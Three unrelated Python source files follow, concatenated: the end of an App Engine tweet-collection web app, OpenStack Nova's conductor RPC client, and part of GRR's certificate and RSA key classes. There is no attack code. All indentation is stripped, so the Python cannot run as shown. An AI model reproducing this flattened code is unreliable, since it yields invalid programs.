jd = json.dumps([t.to_dict() for t in DJI.query().order(DJI.timestamp).fetch()],default=json_date_handler)
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(jd)
class TweetJsonDumpHandler(webapp2.RequestHandler):
def get(self):
import json
q = self.request.get('q')
if q is '':
jd = json.dumps([t.to_dict() for t in Tweet.query().fetch()],default=json_date_handler)
print "all"
else:
jd = json.dumps([t.to_dict() for t in Tweet.query(Tweet.searchTerm == q).fetch()],default=json_date_handler)
print q
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(jd)
class TweetJsonDownloadHandler(webapp2.RequestHandler):
def get(self):
try:
page = int(self.request.get('page'))
size = int(self.request.get('size'))
kwidx = str(self.request.get('kwidx'))
city = str(self.request.get('city'))
dl = int(self.request.get('dl'))
if not kwidx == 'all':
kwidx = int(kwidx)
if kwidx < 0 or kwidx > (len(Q_TERMS)-1):
raise Exception("kwidx")
if not city == 'all':
if not city in [o[0] for o in GEO_LIST]:
raise Exception("city")
if not dl in [0,1]:
raise Exception("dl")
if not kwidx == 'all' and not city == 'all':
raise Exception('index')
except Exception, e:
self.response.out.write("<h3>Please supply valid [page] [size] [kwidx] [city] [dl] para</h3>\
<strong>at least one of [kwidx] [city] must be all</strong> \
</br></br>\
[page] start from <i>1</i> <br>\
[size] page size, positive int, suggest <i>10000</i> <br>\
[kwidx] start from 0 to %d in %s or use <i>all</i><br>\
[city] in %s or use <i>all</i> <br>\
[dl] 0 or 1 whether to download\
" % (len(Q_TERMS)-1,str(Q_TERMS),str([o[0] for o in GEO_LIST])))
return
if kwidx == 'all' and city == 'all':
tws = Tweet.query().fetch(size,offset=(page-1)*size)
elif kwidx == 'all':
tws = Tweet.query(Tweet.searchGeo == GEO_DICT[city]).order(Tweet.timestamp).fetch(size,offset=(page-1)*size)
elif city == 'all':
tws = Tweet.query(Tweet.searchTerm == Q_TERMS[kwidx]).order(Tweet.timestamp).fetch(size,offset=(page-1)*size)
jd = json.dumps([t.to_dict() for t in tws],default=json_date_handler)
self.response.headers['Content-Type'] = 'application/json'
if dl == 1:
self.response.headers['Content-Disposition'] = "attachment;filename=Tweet.size-%d.page-%d.kwidx-%s.city-%s.cnt%d.json" % (size,page,str(kwidx),city,len(tws))
self.response.out.write(jd)
class MainHandler(webapp2.RequestHandler):
def get(self):
dicts = [o.to_dict() for o in DJI.query().order(DJI.timestamp).fetch()]
dots = [{'x':d['dji'],'y':str(d['timestamp'])} for d in dicts]
template_values = {
'dji':dots
}
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.out.write(template.render(template_values))
class TestHandler(webapp2.RequestHandler):
def get(self):
q = self.request.get('q')
if q is None or q is '':
q = 'yale'
geocode = '37.781157,-122.398720,100mi'
if Tweet.query(Tweet.searchTerm==q).count() > 0:
since_id = Tweet.query(Tweet.searchTerm==q).order(-Tweet.id).fetch(1)[0].id
else:
since_id = 0
rst = api.search(q=q,geocode=geocode,since_id=since_id,count=100)
template_values = {
'tweets':rst
}
template = JINJA_ENVIRONMENT.get_template('test.html')
self.response.out.write(template.render(template_values))
app = webapp2.WSGIApplication([
('/', MainHandler),
# ('/I_am_sure_to_delete_all_ndb',NDBDeleteAllHandler),
('/test',TestHandler),
('/cron_fetch_tweet',CronFetchTweetHandler),
('/cron_fetch_dji',CronFetchDJIHandler),
('/cron_dummy',CronDummyHandler),
('/ndb_stats',NDBStatsHandler),
('/ndb_delete',NDBDeleteHandler),
('/json_tws_tmp',TweetJsonDumpHandler),
('/ndb_stats_geo',NDBStatsGeoHandler),
('/json_tws',TweetJsonDownloadHandler),
('/json_dji',DJIJsonHandler)
], debug=True)
| |
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Client side of the conductor RPC API."""
from oslo.config import cfg
from nova.openstack.common import jsonutils
import nova.openstack.common.rpc.proxy
CONF = cfg.CONF
class ConductorAPI(nova.openstack.common.rpc.proxy.RpcProxy):
"""Client side of the conductor RPC API
API version history:
1.0 - Initial version.
1.1 - Added migration_update
1.2 - Added instance_get_by_uuid and instance_get_all_by_host
1.3 - Added aggregate_host_add and aggregate_host_delete
1.4 - Added migration_get
1.5 - Added bw_usage_update
1.6 - Added get_backdoor_port()
1.7 - Added aggregate_get_by_host, aggregate_metadata_add,
and aggregate_metadata_delete
1.8 - Added security_group_get_by_instance and
security_group_rule_get_by_security_group
1.9 - Added provider_fw_rule_get_all
1.10 - Added agent_build_get_by_triple
1.11 - Added aggregate_get
1.12 - Added block_device_mapping_update_or_create
1.13 - Added block_device_mapping_get_all_by_instance
1.14 - Added block_device_mapping_destroy
1.15 - Added instance_get_all_by_filters and
instance_get_all_hung_in_rebooting and
instance_get_active_by_window
Deprecated instance_get_all_by_host
1.16 - Added instance_destroy
1.17 - Added instance_info_cache_delete
1.18 - Added instance_type_get
1.19 - Added vol_get_usage_by_time and vol_usage_update
1.20 - Added migration_get_unconfirmed_by_dest_compute
1.21 - Added service_get_all_by
1.22 - Added ping
1.23 - Added instance_get_all
Un-Deprecate instance_get_all_by_host
1.24 - Added instance_get
1.25 - Added action_event_start and action_event_finish
1.26 - Added instance_info_cache_update
1.27 - Added service_create
1.28 - Added binary arg to service_get_all_by
1.29 - Added service_destroy
1.30 - Added migration_create
1.31 - Added migration_get_in_progress_by_host_and_node
1.32 - Added optional node to instance_get_all_by_host
1.33 - Added compute_node_create and compute_node_update
1.34 - Added service_update
1.35 - Added instance_get_active_by_window_joined
1.36 - Added instance_fault_create
1.37 - Added task_log_get, task_log_begin_task, task_log_end_task
1.38 - Added service name to instance_update
1.39 - Added notify_usage_exists
1.40 - Added security_groups_trigger_handler and
security_groups_trigger_members_refresh
Remove instance_get_active_by_window
1.41 - Added fixed_ip_get_by_instance, network_get,
instance_floating_address_get_all, quota_commit,
quota_rollback
1.42 - Added get_ec2_ids, aggregate_metadata_get_by_host
1.43 - Added compute_stop
"""
BASE_RPC_API_VERSION = '1.0'
def __init__(self):
super(ConductorAPI, self).__init__(
topic=CONF.conductor.topic,
default_version=self.BASE_RPC_API_VERSION)
def ping(self, context, arg, timeout=None):
arg_p = jsonutils.to_primitive(arg)
msg = self.make_msg('ping', arg=arg_p)
return self.call(context, msg, version='1.22', timeout=timeout)
def instance_update(self, context, instance_uuid, updates,
service=None):
updates_p = jsonutils.to_primitive(updates)
return self.call(context,
self.make_msg('instance_update',
instance_uuid=instance_uuid,
updates=updates_p,
service=service),
version='1.38')
def instance_get(self, context, instance_id):
msg = self.make_msg('instance_get',
instance_id=instance_id)
return self.call(context, msg, version='1.24')
def instance_get_by_uuid(self, context, instance_uuid):
msg = self.make_msg('instance_get_by_uuid',
instance_uuid=instance_uuid)
return self.call(context, msg, version='1.2')
def migration_get(self, context, migration_id):
msg = self.make_msg('migration_get', migration_id=migration_id)
return self.call(context, msg, version='1.4')
def migration_get_unconfirmed_by_dest_compute(self, context,
confirm_window,
dest_compute):
msg = self.make_msg('migration_get_unconfirmed_by_dest_compute',
confirm_window=confirm_window,
dest_compute=dest_compute)
return self.call(context, msg, version='1.20')
def migration_get_in_progress_by_host_and_node(self, context,
host, node):
msg = self.make_msg('migration_get_in_progress_by_host_and_node',
host=host, node=node)
return self.call(context, msg, version='1.31')
def migration_create(self, context, instance, values):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('migration_create', instance=instance_p,
values=values)
return self.call(context, msg, version='1.30')
def migration_update(self, context, migration, status):
migration_p = jsonutils.to_primitive(migration)
msg = self.make_msg('migration_update', migration=migration_p,
status=status)
return self.call(context, msg, version='1.1')
def aggregate_host_add(self, context, aggregate, host):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_host_add', aggregate=aggregate_p,
host=host)
return self.call(context, msg, version='1.3')
def aggregate_host_delete(self, context, aggregate, host):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_host_delete', aggregate=aggregate_p,
host=host)
return self.call(context, msg, version='1.3')
def aggregate_get(self, context, aggregate_id):
msg = self.make_msg('aggregate_get', aggregate_id=aggregate_id)
return self.call(context, msg, version='1.11')
def aggregate_get_by_host(self, context, host, key=None):
msg = self.make_msg('aggregate_get_by_host', host=host, key=key)
return self.call(context, msg, version='1.7')
def aggregate_metadata_add(self, context, aggregate, metadata,
set_delete=False):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_metadata_add', aggregate=aggregate_p,
metadata=metadata,
set_delete=set_delete)
return self.call(context, msg, version='1.7')
def aggregate_metadata_delete(self, context, aggregate, key):
aggregate_p = jsonutils.to_primitive(aggregate)
msg = self.make_msg('aggregate_metadata_delete', aggregate=aggregate_p,
key=key)
return self.call(context, msg, version='1.7')
def aggregate_metadata_get_by_host(self, context, host, key):
msg = self.make_msg('aggregate_metadata_get_by_host', host=host,
key=key)
return self.call(context, msg, version='1.42')
def bw_usage_update(self, context, uuid, mac, start_period,
bw_in=None, bw_out=None,
last_ctr_in=None, last_ctr_out=None,
last_refreshed=None):
msg = self.make_msg('bw_usage_update',
uuid=uuid, mac=mac, start_period=start_period,
bw_in=bw_in, bw_out=bw_out,
last_ctr_in=last_ctr_in, last_ctr_out=last_ctr_out,
last_refreshed=last_refreshed)
return self.call(context, msg, version='1.5')
def get_backdoor_port(self, context):
msg = self.make_msg('get_backdoor_port')
return self.call(context, msg, version='1.6')
def security_group_get_by_instance(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('security_group_get_by_instance',
instance=instance_p)
return self.call(context, msg, version='1.8')
def security_group_rule_get_by_security_group(self, context, secgroup):
secgroup_p = jsonutils.to_primitive(secgroup)
msg = self.make_msg('security_group_rule_get_by_security_group',
secgroup=secgroup_p)
return self.call(context, msg, version='1.8')
def provider_fw_rule_get_all(self, context):
msg = self.make_msg('provider_fw_rule_get_all')
return self.call(context, msg, version='1.9')
def agent_build_get_by_triple(self, context, hypervisor, os, architecture):
msg = self.make_msg('agent_build_get_by_triple',
hypervisor=hypervisor, os=os,
architecture=architecture)
return self.call(context, msg, version='1.10')
def block_device_mapping_update_or_create(self, context, values,
create=None):
msg = self.make_msg('block_device_mapping_update_or_create',
values=values, create=create)
return self.call(context, msg, version='1.12')
def block_device_mapping_get_all_by_instance(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('block_device_mapping_get_all_by_instance',
instance=instance_p)
return self.call(context, msg, version='1.13')
def block_device_mapping_destroy(self, context, bdms=None,
instance=None, volume_id=None,
device_name=None):
bdms_p = jsonutils.to_primitive(bdms)
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('block_device_mapping_destroy',
bdms=bdms_p,
instance=instance_p, volume_id=volume_id,
device_name=device_name)
return self.call(context, msg, version='1.14')
def instance_get_all_by_filters(self, context, filters, sort_key,
sort_dir):
msg = self.make_msg('instance_get_all_by_filters',
filters=filters, sort_key=sort_key,
sort_dir=sort_dir)
return self.call(context, msg, version='1.15')
def instance_get_all_hung_in_rebooting(self, context, timeout):
msg = self.make_msg('instance_get_all_hung_in_rebooting',
timeout=timeout)
return self.call(context, msg, version='1.15')
def instance_get_active_by_window_joined(self, context, begin, end=None,
project_id=None, host=None):
msg = self.make_msg('instance_get_active_by_window_joined',
begin=begin, end=end, project_id=project_id,
host=host)
return self.call(context, msg, version='1.35')
def instance_destroy(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('instance_destroy', instance=instance_p)
self.call(context, msg, version='1.16')
def instance_info_cache_delete(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('instance_info_cache_delete', instance=instance_p)
self.call(context, msg, version='1.17')
def instance_type_get(self, context, instance_type_id):
msg = self.make_msg('instance_type_get',
instance_type_id=instance_type_id)
return self.call(context, msg, version='1.18')
def vol_get_usage_by_time(self, context, start_time):
start_time_p = jsonutils.to_primitive(start_time)
msg = self.make_msg('vol_get_usage_by_time', start_time=start_time_p)
return self.call(context, msg, version='1.19')
def vol_usage_update(self, context, vol_id, rd_req, rd_bytes, wr_req,
wr_bytes, instance, last_refreshed=None,
update_totals=False):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('vol_usage_update', vol_id=vol_id, rd_req=rd_req,
rd_bytes=rd_bytes, wr_req=wr_req,
wr_bytes=wr_bytes,
instance=instance_p, last_refreshed=last_refreshed,
update_totals=update_totals)
return self.call(context, msg, version='1.19')
def service_get_all_by(self, context, topic=None, host=None, binary=None):
msg = self.make_msg('service_get_all_by', topic=topic, host=host,
binary=binary)
return self.call(context, msg, version='1.28')
def instance_get_all(self, context):
msg = self.make_msg('instance_get_all')
return self.call(context, msg, version='1.23')
def instance_get_all_by_host(self, context, host, node=None):
msg = self.make_msg('instance_get_all_by_host', host=host, node=node)
return self.call(context, msg, version='1.32')
def instance_fault_create(self, context, values):
msg = self.make_msg('instance_fault_create', values=values)
return self.call(context, msg, version='1.36')
def action_event_start(self, context, values):
values_p = jsonutils.to_primitive(values)
msg = self.make_msg('action_event_start', values=values_p)
return self.call(context, msg, version='1.25')
def action_event_finish(self, context, values):
values_p = jsonutils.to_primitive(values)
msg = self.make_msg('action_event_finish', values=values_p)
return self.call(context, msg, version='1.25')
def instance_info_cache_update(self, context, instance, values):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('instance_info_cache_update',
instance=instance_p,
values=values)
return self.call(context, msg, version='1.26')
def service_create(self, context, values):
msg = self.make_msg('service_create', values=values)
return self.call(context, msg, version='1.27')
def service_destroy(self, context, service_id):
msg = self.make_msg('service_destroy', service_id=service_id)
return self.call(context, msg, version='1.29')
def compute_node_create(self, context, values):
msg = self.make_msg('compute_node_create', values=values)
return self.call(context, msg, version='1.33')
def compute_node_update(self, context, node, values, prune_stats=False):
node_p = jsonutils.to_primitive(node)
msg = self.make_msg('compute_node_update', node=node_p, values=values,
prune_stats=prune_stats)
return self.call(context, msg, version='1.33')
def service_update(self, context, service, values):
service_p = jsonutils.to_primitive(service)
msg = self.make_msg('service_update', service=service_p, values=values)
return self.call(context, msg, version='1.34')
def task_log_get(self, context, task_name, begin, end, host, state=None):
msg = self.make_msg('task_log_get', task_name=task_name,
begin=begin, end=end, host=host, state=state)
return self.call(context, msg, version='1.37')
def task_log_begin_task(self, context, task_name, begin, end, host,
task_items=None, message=None):
msg = self.make_msg('task_log_begin_task', task_name=task_name,
begin=begin, end=end, host=host,
task_items=task_items, message=message)
return self.call(context, msg, version='1.37')
def task_log_end_task(self, context, task_name, begin, end, host, errors,
message=None):
msg = self.make_msg('task_log_end_task', task_name=task_name,
begin=begin, end=end, host=host, errors=errors,
message=message)
return self.call(context, msg, version='1.37')
def notify_usage_exists(self, context, instance, current_period=False,
ignore_missing_network_data=True,
system_metadata=None, extra_usage_info=None):
instance_p = jsonutils.to_primitive(instance)
system_metadata_p = jsonutils.to_primitive(system_metadata)
extra_usage_info_p = jsonutils.to_primitive(extra_usage_info)
msg = self.make_msg('notify_usage_exists', instance=instance_p,
current_period=current_period,
ignore_missing_network_data=ignore_missing_network_data,
system_metadata=system_metadata_p,
extra_usage_info=extra_usage_info_p)
return self.call(context, msg, version='1.39')
def security_groups_trigger_handler(self, context, event, args):
args_p = jsonutils.to_primitive(args)
msg = self.make_msg('security_groups_trigger_handler', event=event,
args=args_p)
return self.call(context, msg, version='1.40')
def security_groups_trigger_members_refresh(self, context, group_ids):
msg = self.make_msg('security_groups_trigger_members_refresh',
group_ids=group_ids)
return self.call(context, msg, version='1.40')
def network_migrate_instance_start(self, context, instance, migration):
instance_p = jsonutils.to_primitive(instance)
migration_p = jsonutils.to_primitive(migration)
msg = self.make_msg('network_migrate_instance_start',
instance=instance_p, migration=migration_p)
return self.call(context, msg, version='1.41')
def network_migrate_instance_finish(self, context, instance, migration):
instance_p = jsonutils.to_primitive(instance)
migration_p = jsonutils.to_primitive(migration)
msg = self.make_msg('network_migrate_instance_finish',
instance=instance_p, migration=migration_p)
return self.call(context, msg, version='1.41')
def quota_commit(self, context, reservations):
reservations_p = jsonutils.to_primitive(reservations)
msg = self.make_msg('quota_commit', reservations=reservations_p)
return self.call(context, msg, version='1.41')
def quota_rollback(self, context, reservations):
reservations_p = jsonutils.to_primitive(reservations)
msg = self.make_msg('quota_rollback', reservations=reservations_p)
return self.call(context, msg, version='1.41')
def get_ec2_ids(self, context, instance):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('get_ec2_ids', instance=instance_p)
return self.call(context, msg, version='1.42')
def compute_stop(self, context, instance, do_cast=True):
instance_p = jsonutils.to_primitive(instance)
msg = self.make_msg('compute_stop', instance=instance_p,
do_cast=do_cast)
return self.call(context, msg, version='1.43')
| |
#!/usr/bin/env python
"""Implementation of various cryptographic types."""
import binascii
import hashlib
import logging
import os
from typing import Text
from cryptography import exceptions
from cryptography import x509
from cryptography.hazmat.backends import openssl
from cryptography.hazmat.primitives import ciphers
from cryptography.hazmat.primitives import constant_time
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import hmac
from cryptography.hazmat.primitives import padding as sym_padding
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import algorithms
from cryptography.hazmat.primitives.ciphers import modes
from cryptography.hazmat.primitives.kdf import pbkdf2
from cryptography.x509 import oid
from grr_response_core.lib import config_lib
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import type_info
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import standard as rdf_standard
from grr_response_core.lib.rdfvalues import structs as rdf_structs
from grr_response_core.lib.util import compatibility
from grr_response_core.lib.util import precondition
from grr_response_core.lib.util import random
from grr_response_core.lib.util import text
from grr_response_proto import jobs_pb2
class Error(Exception):
pass
class VerificationError(Error):
pass
class InvalidSignature(Error):
pass
class CipherError(rdfvalue.DecodeError):
"""Raised when decryption failed."""
class Certificate(rdf_structs.RDFProtoStruct):
protobuf = jobs_pb2.Certificate
class RDFX509Cert(rdfvalue.RDFPrimitive):
"""X509 certificates used to communicate with this client."""
def __init__(self, initializer=None):
if initializer is None:
super().__init__(None)
elif isinstance(initializer, RDFX509Cert):
super().__init__(initializer._value) # pylint: disable=protected-access
elif isinstance(initializer, x509.Certificate):
super().__init__(initializer)
elif isinstance(initializer, bytes):
try:
value = x509.load_pem_x509_certificate(
initializer, backend=openssl.backend)
except (ValueError, TypeError) as e:
raise rdfvalue.DecodeError("Invalid certificate %s: %s" %
(initializer, e))
super().__init__(value)
else:
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
if self._value is not None:
self.GetCN() # This can also raise if there isn't exactly one CN entry.
def GetRawCertificate(self):
return self._value
def GetCN(self):
subject = self._value.subject
try:
cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)
if len(cn_attributes) > 1:
raise rdfvalue.DecodeError("Cert has more than 1 CN entries.")
cn_attribute = cn_attributes[0]
except IndexError:
raise rdfvalue.DecodeError("Cert has no CN")
return cn_attribute.value
def GetPublicKey(self):
return RSAPublicKey(self._value.public_key())
def GetSerialNumber(self):
return self._value.serial_number
def GetIssuer(self):
return self._value.issuer
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls.FromSerializedBytes(string.encode("ascii"))
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls.FromSerializedBytes(value)
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.public_bytes(encoding=serialization.Encoding.PEM)
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def __str__(self) -> Text:
return self.SerializeToBytes().decode("ascii")
def Verify(self, public_key):
"""Verifies the certificate using the given key.
Args:
public_key: The public key to use.
Returns:
True: Everything went well.
Raises:
VerificationError: The certificate did not verify.
"""
# TODO(amoser): We have to do this manually for now since cryptography does
# not yet support cert verification. There is PR 2460:
# https://github.com/pyca/cryptography/pull/2460/files
# that will add it, once it's in we should switch to using this.
# Note that all times here are in UTC.
now = rdfvalue.RDFDatetime.Now().AsDatetime()
if now > self._value.not_valid_after:
raise VerificationError("Certificate expired!")
if now < self._value.not_valid_before:
raise VerificationError("Certificate not yet valid!")
public_key.Verify(
self._value.tbs_certificate_bytes,
self._value.signature,
hash_algorithm=self._value.signature_hash_algorithm)
return True
@classmethod
def ClientCertFromCSR(cls, csr):
"""Creates a new cert for the given common name.
Args:
csr: A CertificateSigningRequest.
Returns:
The signed cert.
"""
builder = x509.CertificateBuilder()
# Use the client CN for a cert serial_id. This will ensure we do
# not have clashing cert id.
common_name = csr.GetCN()
serial = int(common_name.split(".")[1], 16)
builder = builder.serial_number(serial)
builder = builder.subject_name(
x509.Name(
[x509.NameAttribute(oid.NameOID.COMMON_NAME, str(common_name))]))
now = rdfvalue.RDFDatetime.Now()
now_plus_year = now + rdfvalue.Duration.From(52, rdfvalue.WEEKS)
builder = builder.not_valid_after(now_plus_year.AsDatetime())
now_minus_ten = now - rdfvalue.Duration.From(10, rdfvalue.SECONDS)
builder = builder.not_valid_before(now_minus_ten.AsDatetime())
# TODO(user): dependency loop with
# grr/core/grr_response_core/config/client.py.
# pylint: disable=protected-access
ca_cert = config_lib._CONFIG["CA.certificate"]
# pylint: enable=protected-access
builder = builder.issuer_name(ca_cert.GetIssuer())
builder = builder.public_key(csr.GetPublicKey().GetRawPublicKey())
# TODO(user): dependency loop with
# grr/core/grr_response_core/config/client.py.
# pylint: disable=protected-access
ca_key = config_lib._CONFIG["PrivateKeys.ca_key"]
# pylint: enable=protected-access
return RDFX509Cert(
builder.sign(
private_key=ca_key.GetRawPrivateKey(),
algorithm=hashes.SHA256(),
backend=openssl.backend))
class CertificateSigningRequest(rdfvalue.RDFPrimitive):
"""A CSR Rdfvalue."""
def __init__(self, initializer=None, common_name=None, private_key=None):
if isinstance(initializer, CertificateSigningRequest):
super().__init__(initializer._value) # pylint: disable=protected-access
if isinstance(initializer, x509.CertificateSigningRequest):
super().__init__(initializer)
elif isinstance(initializer, bytes):
value = x509.load_pem_x509_csr(initializer, backend=openssl.backend)
super().__init__(value)
elif common_name and private_key:
value = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name(
[x509.NameAttribute(oid.NameOID.COMMON_NAME,
str(common_name))])).sign(
private_key.GetRawPrivateKey(),
hashes.SHA256(),
backend=openssl.backend)
super().__init__(value)
elif initializer is not None:
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls.FromSerializedBytes(value)
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.public_bytes(serialization.Encoding.PEM)
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def __str__(self) -> Text:
return self.SerializeToBytes().decode("ascii")
def GetCN(self):
subject = self._value.subject
try:
cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)
if len(cn_attributes) > 1:
raise rdfvalue.DecodeError("CSR has more than 1 CN entries.")
cn_attribute = cn_attributes[0]
except IndexError:
raise rdfvalue.DecodeError("CSR has no CN")
return cn_attribute.value
def GetPublicKey(self):
return RSAPublicKey(self._value.public_key())
def Verify(self, public_key):
public_key.Verify(
self._value.tbs_certrequest_bytes,
self._value.signature,
hash_algorithm=self._value.signature_hash_algorithm)
return True
class RSAPublicKey(rdfvalue.RDFPrimitive):
"""An RSA public key."""
def __init__(self, initializer=None):
if isinstance(initializer, RSAPublicKey):
initializer = initializer._value # pylint: disable=protected-access
if initializer is None:
super().__init__(None)
return
if isinstance(initializer, rsa.RSAPublicKey):
super().__init__(initializer)
return
if isinstance(initializer, Text):
initializer = initializer.encode("ascii")
if isinstance(initializer, bytes):
try:
value = serialization.load_pem_public_key(
initializer, backend=openssl.backend)
super().__init__(value)
return
except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:
raise type_info.TypeValueError("Public key invalid: %s" % e)
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
def GetRawPublicKey(self):
return self._value
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls.FromSerializedBytes(value)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls.FromSerializedBytes(string.encode("ascii"))
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
def GetN(self):
return self._value.public_numbers().n
def __str__(self) -> Text:
return self.SerializeToBytes().decode("ascii")
# TODO(user): this should return a string, since PEM format
# base64-encodes data and thus is ascii-compatible.
def AsPEM(self):
return self.SerializeToBytes()
def KeyLen(self):
if self._value is None:
return 0
return self._value.key_size
def Encrypt(self, message):
if self._value is None:
raise ValueError("Can't Encrypt with empty key.")
try:
return self._value.encrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None))
except ValueError as e:
raise CipherError(e)
def Verify(self, message, signature, hash_algorithm=None):
"""Verifies a given message."""
# This method accepts both PSS and PKCS1v15 padding. PSS is preferred but
# old clients only support PKCS1v15.
if hash_algorithm is None:
hash_algorithm = hashes.SHA256()
last_e = None
for padding_algorithm in [
padding.PSS(
mgf=padding.MGF1(hash_algorithm),
salt_length=padding.PSS.MAX_LENGTH),
padding.PKCS1v15()
]:
try:
self._value.verify(signature, message, padding_algorithm,
hash_algorithm)
return True
except exceptions.InvalidSignature as e:
last_e = e
raise VerificationError(last_e)
class RSAPrivateKey(rdfvalue.RDFPrimitive):
"""An RSA private key."""
def __init__(self, initializer=None, allow_prompt=None):
if isinstance(initializer, RSAPrivateKey):
initializer = initializer._value # pylint: disable=protected-access
if initializer is None:
super().__init__(None)
return
if isinstance(initializer, rsa.RSAPrivateKey):
super().__init__(initializer)
return
if isinstance(initializer, Text):
initializer = initializer.encode("ascii")
if not isinstance(initializer, bytes):
raise rdfvalue.InitializeError("Cannot initialize %s from %s." %
(self.__class__, initializer))
try:
value = serialization.load_pem_private_key(
initializer, password=None, backend=openssl.backend)
super().__init__(value)
return
except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:
if "private key is encrypted" not in str(e):
raise type_info.TypeValueError("Private key invalid: %s" % e)
# The private key is passphrase protected, we need to see if we are
# allowed to ask the user.
#
# In the case where allow_prompt was not set at all, we use the context
# we are in to see if it makes sense to ask.
if allow_prompt is None:
# TODO(user): dependency loop with
# core/grr_response_core/grr/config/client.py.
# pylint: disable=protected-access
if "Commandline Context" not in config_lib._CONFIG.context:
raise type_info.TypeValueError("Private key invalid: %s" % e)
# pylint: enable=protected-access
# Otherwise, if allow_prompt is False, we are explicitly told that we are
# not supposed to ask the user.
elif not allow_prompt:
raise type_info.TypeValueError("Private key invalid: %s" % e)
try:
# The private key is encrypted and we can ask the user for the passphrase.
password = utils.PassphraseCallback()
value = serialization.load_pem_private_key(
initializer, password=password, backend=openssl.backend)
super().__init__(value)
except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:
raise type_info.TypeValueError("Unable to load private key: %s" % e)
@classmethod
def FromHumanReadable(cls, string: Text):
precondition.AssertType(string, Text)
return cls.FromSerializedBytes(string.encode("ascii"))
def GetRawPrivateKey(self):
return self._value
def GetPublicKey(self):
return RSAPublicKey(self._value.public_key())
def Sign(self, message, use_pss=False):
"""Sign a given message."""
precondition.AssertType(message, bytes)
# TODO(amoser): This should use PSS by default at some point.
if not use_pss:
padding_algorithm = padding.PKCS1v15()
else:
padding_algorithm = padding.PSS(
mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)
return self._value.sign(message, padding_algorithm, hashes.SHA256())
def Decrypt(self, message):
if self._value is None:
raise ValueError("Can't Decrypt with empty key.")
try:
return self._value.decrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None))
except ValueError as e:
raise CipherError(e)
@classmethod
def GenerateKey(cls, bits=2048, exponent=65537):
key = rsa.generate_private_key(
public_exponent=exponent, key_size=bits, backend=openssl.backend)
return cls(key)
@classmethod
def FromSerializedBytes(cls, value: bytes):
precondition.AssertType(value, bytes)
return cls(value)
@classmethod
def FromWireFormat(cls, value):
precondition.AssertType(value, bytes)
return cls(value)
def SerializeToBytes(self) -> bytes:
if self._value is None:
return b""
return self._value.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
def __str__(self) -> Text:
digest = hashlib.sha256(self.AsPEM()).hexdigest()
# TODO: `hexdigest` returns a unicode object in Python 3, but
# bytes object in Python 2. Once support for Python 2 is dropped, this can
# be safely removed.
if compatibility.PY2:
digest = digest.decode("ascii") # pytype: disable=attribute-error
return "%s (%s)" % (compatibility.GetName(self.__class__), digest)
# TODO(user): this should return a string, since PEM format
